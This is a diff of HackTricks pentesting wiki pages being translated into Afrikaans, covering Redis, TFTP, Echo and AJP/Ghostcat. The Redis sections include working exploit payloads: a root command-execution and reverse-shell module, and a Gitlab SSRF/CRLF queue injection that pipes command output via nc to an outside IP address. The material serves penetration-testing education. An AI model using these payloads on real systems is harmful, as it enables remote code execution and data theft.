jy wil: `MODULE UNLOAD mymodule` - ``` - 127.0.0.1:6379> system.exec "id" - "uid=0(root) gid=0(root) groups=0(root)\n" - 127.0.0.1:6379> system.exec "whoami" - "root\n" - 127.0.0.1:6379> system.rev 127.0.0.1 9999 - ``` -6. Unload the module whenever you want: `MODULE UNLOAD mymodule` +### LUA sandboks omseil -### LUA sandbox bypass +[**Hier**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) kan jy sien dat Redis die bevel **EVAL** gebruik om **Lua-kode in 'n sandboks** uit te voer. In die gekoppelde pos kan jy sien **hoe om dit te misbruik** deur die **dofile**-funksie te gebruik, maar [blykbaar](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) is dit nie meer moontlik nie. In elk geval, as jy die Lua-sandboks kan **omseil**, kan jy willekeurige bevele op die stelsel uitvoer. Daarbenewens kan jy van dieselfde pos enkele **opsies gebruik om DoS** te veroorsaak. -[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dofile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commands on the system. Also, from the same post you can see some **options to cause DoS**. - -Some **CVEs to escape from LUA**: +Sommige **CVE's om uit LUA te ontsnap**: * [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543) -### Master-Slave Module - -​The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis. +### Meester-Slaaf Module +Die meester-redis se alle operasies word outomaties gesinkroniseer na die slaaf-redis, wat beteken dat ons die kwesbaarheid-redis as 'n slaaf-redis kan beskou, wat verbind is met die meester-redis wat ons eie beheer word, dan kan ons die bevel in ons eie redis invoer. ``` master redis : 10.85.0.51 (Hacker's Server) slave redis : 10.85.0.52 (Target Vulnerability Server) @@ -305,11 +276,9 @@ redis-cli -h 10.85.0.51 -p 6379 set mykey hello set mykey2 helloworld ``` +## SSRF praat met Redis -## SSRF talking to Redis - -If you can send **clear text** request **to Redis**, you can **communicate with it** as Redis will read line by line the request and just respond with errors to the lines it doesn't understand: - +As jy 'n **duidelike teksversoek** na **Redis** kan stuur, kan jy **met dit kommunikeer** omdat Redis die versoek lyn vir lyn sal lees en net met foute sal antwoord op die lyne wat dit nie verstaan nie: ``` -ERR wrong number of arguments for 'get' command -ERR unknown command 'Host:' @@ -319,55 +288,50 @@ If you can send **clear text** request **to Redis**, you can **communicate with -ERR unknown command 'Cache-Control:' -ERR unknown command 'Connection:' ``` +Daarom, as jy 'n **SSRF vuln** in 'n webwerf vind en jy kan sekere **headers** (miskien met 'n CRLF vuln) of **POST parameters** **beheer**, sal jy in staat wees om willekeurige opdragte na Redis te stuur. -Therefore, if you find a **SSRF vuln** in a website and you can **control** some **headers** (maybe with a CRLF vuln) or **POST parameters**, you will be able to send arbitrary commands to Redis. +### Voorbeeld: Gitlab SSRF + CRLF na Shell -### Example: Gitlab SSRF + CRLF to Shell - -In **Gitlab11.4.7** were discovered a **SSRF** vulnerability and a **CRLF**. The **SSRF** vulnerability was in the **import project from URL functionality** when creating a new project and allowed to access arbitrary IPs in the form \[0:0:0:0:0:ffff:127.0.0.1] (this will access 127.0.0.1), and the **CRLF** vuln was exploited just **adding %0D%0A** characters to the **URL**. - -Therefore, it was possible to **abuse these vulnerabilities to talk to the Redis instance** that **manages queues** from **gitlab** and abuse those queues to **obtain code execution**. The Redis queue abuse payload is: +In **Gitlab11.4.7** is 'n **SSRF**-kwesbaarheid en 'n **CRLF** ontdek. Die **SSRF**-kwesbaarheid was in die **importeer projek van URL-funksionaliteit** tydens die skep van 'n nuwe projek en het toegang tot willekeurige IP-adresse in die vorm \[0:0:0:0:0:ffff:127.0.0.1] (dit sal toegang tot 127.0.0.1 gee) moontlik gemaak, en die **CRLF**-vuln is uitgebuit deur net **%0D%0A** karakters by die **URL** te voeg. +Daarom was dit moontlik om hierdie kwesbaarhede te **misbruik om met die Redis-instantie te kommunikeer** wat **queues bestuur** vanaf **gitlab** en daardie queues te misbruik om **kodes uit te voer**. Die Redis queue misbruik payload is: ``` - multi - sadd resque:gitlab:queues system_hook_push - lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" - exec +multi +sadd resque:gitlab:queues system_hook_push +lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" +exec ``` - -And the **URL encode** request **abusing SSRF** and **CRLF** to execute a `whoami` and send back the output via `nc` is: - +En die **URL-kodering** versoek **misbruik SSRF** en **CRLF** om 'n `whoami` uit te voer en die uitset terug te stuur via `nc` is: ``` git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` - -_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._ +_Vir 'n rede (soos vir die skrywer van_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _waar hierdie inligting vandaan kom) het die uitbuiting gewerk met die `git` skema en nie met die `http` skema nie._
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking Insigtings**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hackering wêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagte wat begin en kritieke platform opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringstruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/69-udp-tftp.md b/network-services-pentesting/69-udp-tftp.md index b967d7a37..24abe855f 100644 --- a/network-services-pentesting/69-udp-tftp.md +++ b/network-services-pentesting/69-udp-tftp.md @@ -1,45 +1,38 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM images** to devices such as **VoIP handsets**, thanks to its efficiency in these specific scenarios. +**Trivial File Transfer Protocol (TFTP)** is 'n eenvoudige protokol wat op **UDP-poort 69** gebruik word om lêeroordragte sonder verifikasie moontlik te maak. Dit word uitgelig in **RFC 1350**, maar weens sy eenvoud ontbreek dit aan belangrike sekuriteitskenmerke, wat lei tot beperkte gebruik op die openbare internet. Nietemin word **TFTP** wyd gebruik binne groot interne netwerke om **konfigurasie-lêers** en **ROM-beelde** na toestelle soos **VoIP-handsets** te versprei, dankie aan sy doeltreffendheid in hierdie spesifieke scenario's. -**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). If you have more info about this let us know for example in the [**HackTricks telegram group**](https://t.me/peass) (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)). - -**Default Port:** 69/UDP +**TODO**: Verskaf inligting oor wat 'n Bittorrent-tracker is (Shodan identifiseer hierdie poort met daardie naam). As jy meer inligting hieroor het, laat ons weet byvoorbeeld in die [**HackTricks telegram-groep**](https://t.me/peass) (of in 'n github-uitgawe in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)). +**Verstekpoort:** 69/UDP ``` PORT STATE SERVICE REASON 69/udp open tftp script-set ``` +# Opname -# Enumeration - -TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths. - +TFTP verskaf nie 'n lys van gids nie, so die skrip `tftp-enum` van `nmap` sal probeer om standaard paaie met 'n brute-force aanval te agterhaal. ```bash nmap -n -Pn -sU -p69 -sV --script tftp-enum ``` +## Aflaai/Oplaai -## Download/Upload - -You can use Metasploit or Python to check if you can download/upload files: - +Jy kan Metasploit of Python gebruik om te kyk of jy lêers kan aflaai/oplaai: ```bash msf5> auxiliary/admin/tftp/tftp_transfer_util ``` @@ -50,7 +43,6 @@ client = tftpy.TftpClient(, ) client.download("filename in server", "/tmp/filename", timeout=5) client.upload("filename to upload", "/local/path/file", timeout=5) ``` - ## Shodan * `port:69` @@ -58,16 +50,14 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/network-services-pentesting/7-tcp-udp-pentesting-echo.md index 234edbca9..fd8eb5b31 100644 --- a/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -1,47 +1,49 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\ -**It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\ -Info from [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/) - -**Default Port:** 7/tcp/udp +'n Echo-diens word op hierdie gasheer uitgevoer. Die echo-diens was bedoel vir toets- en meetdoeleindes en kan op beide TCP- en UDP-protokolle luister. Die bediener stuur enige data wat dit ontvang terug, sonder enige wysiging.\ +**Dit is moontlik om 'n denial of service te veroorsaak deur die aanskakeling van 'n echo-diens aan die echo-diens op dieselfde of 'n ander masjien**. As gevolg van die oormatig hoë aantal pakkies wat geproduseer word, kan die geaffekteerde masjiene effektief buite werking gestel word.\ +Inligting vanaf [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/) +**Verstekpoort:** 7/tcp/udp ``` PORT STATE SERVICE 7/udp open echo 7/tcp open echo ``` +## Kontak Echo-diens (UDP) -## Contact Echo service (UDP) +To contact an Echo service using UDP, you can use the `nc` command with the `-u` flag followed by the IP address and port number of the target. For example: +```bash +nc -u +``` + +The Echo service will simply send back any data it receives, allowing you to test the connectivity and response of the target system. ```bash nc -uvn 7 Hello echo #This is wat you send Hello echo #This is the response ``` - ## Shodan * `port:7 echo` -## References +## Verwysings [Wikipedia echo](http://en.wikipedia.org/wiki/ECHO\_protocol) @@ -50,16 +52,14 @@ Hello echo #This is the response
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index a30512e37..b068d46a8 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -1,82 +1,77 @@ -# 8009 - Pentesting Apache JServ Protocol (AJP) +# 8009 - Pentesting Apache JServ-Protokol (AJP)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters vir belonings! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbelydenisse en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) +Vanaf: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) -> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. +> AJP is 'n draadprotokol. Dit is 'n geoptimeerde weergawe van die HTTP-protokol wat 'n afsonderlike webbediener soos [Apache](http://httpd.apache.org/) in staat stel om met Tomcat te kommunikeer. Histories gesien was Apache baie vinniger as Tomcat om statiese inhoud te bedien. Die idee is om Apache toe te laat om die statiese inhoud te bedien waar moontlik, maar om die versoek na Tomcat te stuur vir Tomcat-verwante inhoud. -Also interesting: +Ook interessant: -> The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles - -**Default port:** 8009 +> Die ajp13-protokol is pakketgeoriënteerd. 'n Binêre formaat is waarskynlik gekies bo die meer leesbare platte teks vir prestasie-redes. Die webbediener kommunikeer met die servlet-houer oor TCP-verbindings. Om die duur proses van soket-skepping te verminder, sal die webbediener probeer om volgehoue TCP-verbindings na die servlet-houer te handhaaf en 'n verbinding vir meerdere versoek-/antwoord-siklusse te hergebruik. +**Verstekpoort:** 8009 ``` PORT STATE SERVICE 8009/tcp open ajp13 ``` - ## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat) -If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue. +As die AJP-poort blootgestel word, kan Tomcat vatbaar wees vir die Ghostcat-kwesbaarheid. Hier is 'n [exploit](https://www.exploit-db.com/exploits/48143) wat werk met hierdie probleem. -Ghostcat is a LFI vulnerability, but somewhat restricted: only files from a certain path can be pulled. Still, this can include files like `WEB-INF/web.xml` which can leak important information like credentials for the Tomcat interface, depending on the server setup. +Ghostcat is 'n LFI-kwesbaarheid, maar enigsins beperk: slegs lêers vanaf 'n sekere pad kan getrek word. Dit kan steeds lêers soos `WEB-INF/web.xml` insluit wat belangrike inligting soos geloofsbriewe vir die Tomcat-koppelvlak kan uitlek, afhangende van die bedieneropset. -Patched versions at or above 9.0.31, 8.5.51, and 7.0.100 have fixed this issue. +Gepatchte weergawes by of bo 9.0.31, 8.5.51 en 7.0.100 het hierdie probleem reggestel. -## Enumeration - -### Automatic +## Enumerasie +### Outomaties ```bash nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#ajp) ## AJP Proxy -### Nginx Reverse Proxy & AJP +### Nginx Omgekeerde Proxy & AJP -[Checkout the Dockerized version](#Dockerized-version) +[Kyk na die Dockerized weergawe](#Dockerized-weergawe) -When we come across an open AJP proxy port (8009 TCP), we can use Nginx with the `ajp_module` to access the "hidden" Tomcat Manager. This can be done by compiling the Nginx source code and adding the required module, as follows: - -* Download the Nginx source code -* Download the required module -* Compile Nginx source code with the `ajp_module`. -* Create a configuration file pointing to the AJP Port +Wanneer ons op 'n oop AJP proxy-poort (8009 TCP) afkomstig is, kan ons Nginx met die `ajp_module` gebruik om toegang tot die "verborge" Tomcat-bestuurder te verkry. Dit kan gedoen word deur die Nginx-bronkode af te laai en die vereiste module by te voeg, soos volg: +* Laai die Nginx-bronkode af +* Laai die vereiste module af +* Kompileer die Nginx-bronkode met die `ajp_module`. +* Skep 'n konfigurasie-lêer wat na die AJP-poort verwys ```bash # Download Nginx code wget https://nginx.org/download/nginx-1.21.3.tar.gz @@ -91,128 +86,117 @@ make sudo make install nginx -V ``` - -Comment out the entire `server` block and append the following lines inside the `http` block in `/etc/nginx/conf/nginx.conf`. - +Kommentaar uit die hele `server` blok en voeg die volgende lyne by binne die `http` blok in `/etc/nginx/conf/nginx.conf`. ```shell-session upstream tomcats { - server :8009; - keepalive 10; - } +server :8009; +keepalive 10; +} server { - listen 80; - location / { - ajp_keep_conn on; - ajp_pass tomcats; - } +listen 80; +location / { +ajp_keep_conn on; +ajp_pass tomcats; +} } ``` - -Start Nginx and check if everything is working correctly by issuing a cURL request to your local host. - +Begin deur Nginx te begin en te kontroleer of alles korrek werk deur 'n cURL-versoek na jou plaaslike bediener te stuur. ```html sudo nginx curl http://127.0.0.1:80 - - - Apache Tomcat/X.X.XX - - - - -
- -
-

Apache Tomcat/X.X.XX

-
-
-
-

If you're seeing this, you've successfully installed Tomcat. Congratulations!

+ + +Apache Tomcat/X.X.XX + + + + +
+ +
+

Apache Tomcat/X.X.XX

+
+
+
+

